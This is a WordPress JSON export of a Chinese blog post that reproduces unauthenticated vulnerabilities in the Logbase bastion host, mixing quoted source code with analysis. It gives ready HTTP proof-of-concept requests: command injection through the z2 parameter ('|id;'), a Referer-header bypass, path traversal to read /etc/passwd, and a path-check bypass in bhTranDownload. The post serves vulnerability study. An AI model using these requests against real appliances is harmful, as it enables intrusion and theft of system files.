{"id":991,"date":"2024-02-08T08:00:00","date_gmt":"2024-02-08T00:00:00","guid":{"rendered":"http:\/\/119.45.47.125\/?p=991"},"modified":"2024-02-21T10:30:22","modified_gmt":"2024-02-21T02:30:22","slug":"logbase","status":"publish","type":"post","link":"http:\/\/119.45.47.125\/index.php\/2024\/02\/08\/logbase\/","title":{"rendered":"Logbase\u601d\u8fea\u798f\u5821\u5792\u673a\u6f0f\u6d1e\u590d\u73b0"},"content":{"rendered":"
\n \u53bb\u5e7412\u6708\u4e2d\u65ec\u7206\u51fa\u6765\u4e86 RCE \u7684\u6f0f\u6d1e\uff0c\u5f53\u65f6\u7b80\u5355\u770b\u4e86\u4e0b\uff0c\u4ea4\u4e86\u51e0\u4e2a edusrc \u5c31\u8fc7\u53bb\u4e86\uff0c\u516c\u7f51\u4e0a\u73b0\u5728\u5e94\u8be5\u90fd\u4fee\u590d\u5b8c\u4e86\uff0c\u73b0\u5728\u6709\u65f6\u95f4\u4e86\u770b\u770b\u4ee3\u7801\n<\/blockquote>\n
\"\"<\/div>\n
\n

1.user_add.py \u4e2d\u7684 repeat_get_usb_status \u672a\u6388\u6743 SQL \u6ce8\u5165\u6f0f\u6d1e<\/h3>\n
@user_add.route('\/repeat_get_usb_status',methods=['GET','POST'])\ndef repeat_get_usb_status():\n    session = request.form.get('a0')\n    sesstime = request.form.get('z1')\n    ...\n    try:\n        sql = \"select \\\"Status\\\" from private.\\\"USBKeyResult\\\" where \\\"SessTime\\\" = '%s';\" %(MySQLdb.escape_string(sesstime));\n        curs.execute(sql)\n    ...\n<\/code><\/pre>\n
\u8fd9\u4e2a\u6f0f\u6d1e\u5f88\u65e9\u4e86\uff0c\u4e24\u4e09\u5e74\u524d\u7684\u5427\uff0c\u4e0a\u9762\u7684\u662f\u4fee\u590d\u8fc7\u7684\u4ee3\u7801\uff0c\u53ef\u4ee5\u770b\u5230 sql \u5728\u62fc\u63a5\u7684\u65f6\u5019\u7528 MySQLdb.escape_string()<\/code> \u5904\u7406\u4e86\uff0c\u4e4b\u524d\u662f\u76f4\u63a5\u62fc\u63a5\u7684<\/p>\n
\u5927\u81f4\u626b\u4e86\u4e0b\uff0c\u5176\u4ed6\u5730\u65b9\u7684 sql \u8bed\u53e5\u62fc\u63a5\u524d\u57fa\u672c\u4e0a\u90fd\u6709\u5f3a\u5236\u7c7b\u578b\u8f6c\u6362\u548c MySQLdb.escape_string()<\/code> \u5904\u7406\uff0c\u5e94\u8be5\u662f\u6ca1\u6709 SQL \u6ce8\u5165\u4e86\uff1f<\/p>\n
\n
2.get_qrcode.py \u4e2d\u7684 test_qrcode_b \u672a\u6388\u6743 RCE \u6f0f\u6d1e<\/h3>\n
@get_qrcode.route('\/test_qrcode_b',methods=['GET', 'POST'])\ndef test_qrcode_b():\n    totp_v = request.form.get('z1')\n    secret = request.form.get('z2')\n    user_account = request.form.get('z3')\n    if checkaccountForLogin(user_account) == False:\n        return '{\\\"Result\\\":false,\\\"secret\\\":\\\"\\\",\"img\":\"\"}'\n\n    user_account = GetuCode(user_account).lower();\n\n    cmd = 'java -jar -Djava.awt.headless=true \/flash\/system\/appr\/botp_auth.jar 1 \"' +secret+ '\" \"' +totp_v+ '\"'\n    r = os.popen(cmd)\n    text = r.read()\n    r.close()\n    if text == \"true\":\n        try:\n            with pyodbc.connect(StrSqlConn('BH_CONFIG')) as conn,conn.cursor() as curs:\n                sql = \"UPDATE public.\\\"User\\\" SET \\\"SecretKey1\\\"=\\'%s\\' WHERE \\\"UserCode\\\"='%s'\" % (MySQLdb.escape_string(str(secret)),MySQLdb.escape_string(user_account))\n                curs.execute(sql)\n        except pyodbc.Error,e:\n            return \"{\\\"Result\\\":false,\\\"ErrMsg\\\":\\\"\u7cfb\u7edf\u5f02\u5e38: %s(%d)\\\"}\" % (ErrorEncode(e.args[1]),sys._getframe().f_lineno)\n    return text\n<\/code><\/pre>\n
totp_v<\/code> \u548c secret<\/code> \u63a5\u6536\u7528\u6237\u8f93\u5165\u7684\u53c2\u6570\u5e76\u76f4\u63a5\u62fc\u63a5\u5230 cmd<\/code> \u4e2d\uff0c\u7136\u540e os.popen()<\/code> \u6267\u884c<\/p>\n
\u6240\u4ee5\u7f51\u4e0a\u6d41\u4f20\u7684 POC \u662f\u5728 z2<\/code> \u4e0a\u5b9e\u73b0\u547d\u4ee4\u6ce8\u5165<\/p>\n
POST \/bhost\/test_qrcode_b HTTP\/1.1\nHost: \nUser-Agent: Go-http-client\/1.1\nAccept-Encoding: gzip, deflate, br\nAccept: gzip\nConnection: close\nReferer: \nContent-Type: application\/x-www-form-urlencoded\n\nz1=1&z2=\"|id;\"&z3=bhost\n<\/code><\/pre>\n
\u4f46\u5176\u5b9e z1<\/code> \u548c z2<\/code> \u90fd\u662f\u4e00\u6837\u7684<\/p>\n
\"\"<\/div>\n
\u81f3\u4e8e z3<\/code>\uff0c\u7b26\u5408 checkaccountForLogin<\/code> \u5373\u53ef<\/p>\n
#\u8d26\u53f7 \u90ae\u7bb1 \u624b\u673a\ndef checkaccountForLogin(account):\n    p = re.compile(u'^[\\w#\\.\\-\\u4E00-\\u9FA5@_]+$')\n    if p.match(account):\n        return True\n    else:\n        return False\n<\/code><\/pre>\n
\u540c\u65f6\u6ce8\u610f Referer \u5934\uff0c\u5982\u679c\u4e0d\u52a0\uff0c\u5c31\u4f1a\u8fd4\u56de 403 FORBIDDEN\uff0c\u627e\u4e86\u4e0b\u5e94\u8be5\u662f\u5728 login.py \u7684 request_check()<\/code><\/p>\n
@app.before_request\ndef request_check():\n...\n###\u83b7\u53d6 HTTP_REFERER \n        refer_url_tmp = request.referrer;\n        if refer_url_tmp == None:\n            if path_url == '\/index':\n                return render_template('err404.html',jump='\/'),403\n            else:\n                return render_template('err403.html'),403\n            sys.exit();\n        else:\n            refer_url = refer_url_tmp.split(\"\/\")[2].split(':')[0];\n...\n<\/code><\/pre>\n
\u5f80\u4e0a\u7ffb\u4e86\u7ffb\uff0c\u53d1\u73b0\u9664\u4e86 test_qrcode_b<\/code> \u5916\uff0c\u8fd8\u6709\u4e00\u4e2a\u5730\u65b9\u4e5f\u8c03\u4e86 os.popen()<\/code>\uff0c\u4f46\u662f\u88ab checkaccountForLogin<\/code> \u9650\u5236\u6b7b\u4e86\uff0c\u6ca1\u529e\u6cd5\u5229\u7528<\/p>\n
def create_qrcode1(username):\n    cmd = 'java -jar -Djava.awt.headless=true \/flash\/system\/appr\/botp_auth.jar 0 \"' +username+ '\"'\n    r = os.popen(cmd)\n    text = r.read()\n    r.close()\n    return text\n\n@get_qrcode.route('\/get_qrcode_img_b',methods=['GET', 'POST'])\ndef get_qrcode_img_b():\n    user_account = request.form.get('z1')\n    if checkaccountForLogin(user_account) == False:\n        return '{\\\"Result\\\":false,\\\"secret\\\":\\\"\\\",\"img\":\"\"}'\n    user_account = GetuCode(user_account).lower();\n    #valid_codes =get_totp_token(secret)\n    secret = create_qrcode1(user_account)\n    return '{\\\"Result\\\":true, \"secret\":\"' +secret.split('\\n')[0]+ '\", \"img\":\"\/manage\/images\/botp_code.jpg\"}'\n<\/code><\/pre>\n
\n
3.login.py \u4e2d\u7684 GetCaCert \u672a\u6388\u6743\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e<\/h3>\n
@app.route(\"\/GetCaCert\", methods=['GET', 'POST'])\ndef GetCaCert():\n    headers  = str(request.headers) ;\n    debug(headers)\n    '''\n    if str(headers).find('Name')< 0:\n        return '',400;\n\n    Name = headers.split('Name')[1].split()[1];\n    '''\n    if headers.find(\"a1\") < 0:\n        Name = request.args.get('a1')\n    else:\n        Name = headers.split('a1',0)[1].split()[1];\n\n    try:\n        if os.path.exists('\/usr\/etc\/'+Name):\n            fp = open('\/usr\/etc\/'+Name,'r');\n            a = base64.b64encode(fp.read());\n            return a,200\n        else:\n            return '',400\n    except pyodbc.Error,e:\n        return '',400\n<\/code><\/pre>\n
\u8fd9\u4e2a\u4e5f\u5f88\u5bb9\u6613\u53d1\u73b0\uff0cName<\/code> \u63a5\u6536\u4e86\u4f20\u9012\u8fdb\u6765\u7684 a1<\/code>\uff0c\u7136\u540e\u76f4\u63a5\u62fc\u63a5\u8fdb open()<\/code>\uff0c\u518d\u4ee5 base64 \u7f16\u7801\u7684\u5f62\u5f0f\u8fd4\u56de<\/p>\n
GET \/bhost\/GetCaCert?a1=..\/..\/..\/..\/..\/etc\/passwd HTTP\/1.1\nHost:\nUser-Agent: Go-http-client\/1.1\nAccept-Encoding: gzip, deflate, br\nAccept: gzip\nConnection: close\nReferer:\n<\/code><\/pre>\n
\"\"<\/div>\n
\n
4.tran.py \u4e2d\u7684 bhTranDownload \u672a\u6388\u6743\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6<\/h3>\n
\u8fd9\u4e2a\u5e94\u8be5\u4e5f\u662f\u8001\u7684\uff0c\u53c2\u8003\u4e86\u300aLogbase\u601d\u8fea\u798f\u5821\u5792\u673a\u6f0f\u6d1e\u5206\u6790\u300b<\/a>\uff0c\u56e0\u4e3a\u6211\u624b\u4e0a\u7684\u6e90\u7801\u5df2\u7ecf\u4fee\u590d\u8fd9\u4e2a\u5730\u65b9\u4e86<\/p>\n
@tran.route(\"\/bhTranDownload\", methods=['GET', 'POST'])\ndef bhTranDownload():\n    headers  = str(request.headers) ;\n    ##\u89e3\u6790\u5934\u6587\u4ef6\n    try:\n        ret,Filename,Session,Path,Method,Offset,Content_Length,sesstimet = parseHeader(headers);\n        if ret < 0:\n            return' -1';\n    except Exception,e:\n        return '-1';\n    Path = base64.b64decode(Path);\n    try:\n        Filename_tmp = base64.b64decode(base64.b64decode(Filename));\n        FilePath = Path + '\/' + Filename_tmp;\n        if os.path.exists(FilePath) == False:\n            Filename = base64.b64decode(Filename)\n        else:\n            Filename = Filename_tmp\n\n    except:\n        Filename = base64.b64decode(Filename)\n    if check_path(Path) == False and Filename !='cf_tnsora':\n        return '-1',403;\nif Path.find(\"\/software\") >=0 or Method =='GetSize' or Filename =='cf_tnsora': ###\u7cfb\u7edf\u81ea\u52a8\u5347\u7ea7 \u6ca1\u6709session\n        pass\nelse:\n    client_ip = GetClientIp(request);\n    (error,userCode,mac,lock) = SessionCheck(Session,client_ip);\n<\/code><\/pre>\n
\u8bf7\u6c42\u5934\u91cc\u9700\u8981\u5305\u542b Filename,Session,Path,Offset,Content_Length,sesstimet<\/code> \u8fd9\u4e9b\u5b57\u6bb5\uff0c\u540c\u65f6\u53ea\u8981\u6ce8\u610f\u6ee1\u8db3 if \u7684\u7b2c\u4e00\u4e2a\u6761\u4ef6\uff0c\u4e0d\u8fdb\u5165 else \u7684\u9a8c\u8bc1\u5c31\u53ef\u4ee5\u672a\u6388\u6743\u8bfb\u4e86<\/p>\n
def check_path(path):\n    for one in list_path:\n        if path.find(one) >=0:\n            return True\n    return False\n\nlist_path = ['\/usr\/storage\/.system\/upload','\/usr\/storage\/.system\/replay','\/usr\/storage\/.system\/software','\/usr\/storage\/.system\/update','\/usr\/storage\/.system\/config\/backup','\/usr\/storage\/.system\/dwload','\/usr\/storage\/.system\/passwd','\/usr\/storage\/.system\/backup','\/usr\/storage\/.system\/transf','\/usr\/ssl\/certs','\/usr\/storage\/.system\/archive']\n<\/code><\/pre>\n
\u6839\u636e\u4ee3\u7801\uff0c\u5c06 Path<\/code> \u7684\u503c\u56fa\u5b9a\u4e3a base64.b64encode(''\/usr\/storage\/.system\/software')<\/code> \u5c31\u53ef\u4ee5<\/p>\n
\u6700\u540e\u7684\u6587\u4ef6\u8bfb\u53d6\u4f9d\u9760 Path<\/code> \u548c Filename<\/code> \u5b8c\u6210\uff0cFilename<\/code> \u76ee\u5f55\u56de\u6eaf\u4e00\u4e0b\uff0c\u540c\u7406\u7ecf\u8fc7 base64 \u7f16\u7801\u5c31\u53ef\u4ee5<\/p>\n
if Filename.find('.\/') >=0 or Filename.find('..\/') >=0 :\n    return '-1',403;\nFilePath = Path + '\/' + Filename;\n##\u5224\u65ad\u6587\u4ef6\u662f\u5426\u5b58\u5728\nif os.path.exists(FilePath) == False:\n    return '-1';\n\nif Method == \"\": ## \u4e0b\u8f7d\n    ##\u6bcf\u6b21\u8bfb\u53d6\u6587\u4ef6\u7684 8k  8 * 1024\n    try:\n        with open(FilePath, 'rb') as fp:\n            fp.seek(int(Offset));\n            data = fp.read(MAX_SIZE);\n        return data;\n    except Exception,e:\n        return '-1';\n<\/code><\/pre>\n
\u4fee\u590d\u540e\u7684\u4ee3\u7801\u91cc\uff0c\u5728 FilePath<\/code> \u62fc\u63a5\u8d4b\u503c\u524d\u591a\u4e86\u4e2a\u8fc7\u6ee4\u68c0\u67e5\u4ee3\u7801\uff0c\u5bc4\u4e86<\/p>\n
\n
\u4e0a\u9762\u7684\u6d1e\u90fd\u662f\u672a\u6388\u6743\u7684\uff0c\u4e5f\u5c31\u662f\u4ee3\u7801\u4e2d\u4e0d\u5305\u542b\uff08\u6267\u884c\uff09 SessionCheck()<\/code>\uff0c\u4f46\u662f\u8fd9\u4e2a\u51fd\u6570\u5168\u5c40\u641c\u7d22\u4e5f\u6ca1\u627e\u5230\u5728\u54ea\ud83d\ude13 (\u00b0\u30fc\u00b0\u3003)<\/p>","protected":false},"excerpt":{"rendered":"\u53bb\u5e7412\u6708\u4e2d\u65ec\u7206\u51fa\u6765\u4e86 RCE \u7684\u6f0f\u6d1e\uff0c\u5f53\u65f6\u7b80\u5355\u770b\u4e86\u4e0b\uff0c\u4ea4\u4e86\u51e0\u4e2a edusrc \u5c31\u8fc7\u53bb\u4e86\uff0c\u516c\u7f51\u4e0a\u73b0\u5728\u5e94\u8be5\u90fd\u4fee\u590d […]","protected":false},"author":1,"featured_media":995,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[26,38],"tags":[37],"class_list":["post-991","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-study","category-vuln_study","tag-vuln"],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/119.45.47.125\/wp-content\/uploads\/2024\/02\/1708390535-%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE-2024-02-20-085506.png?fit=1133%2C676","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/posts\/991","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/comments?post=991"}],"version-history":[{"count":11,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/posts\/991\/revisions"}],"predecessor-version":[{"id":1004,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/posts\/991\/revisions\/1004"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/media\/995"}],"wp:attachment":[{"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/media?parent=991"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/categories?post=991"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/tags?post=991"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}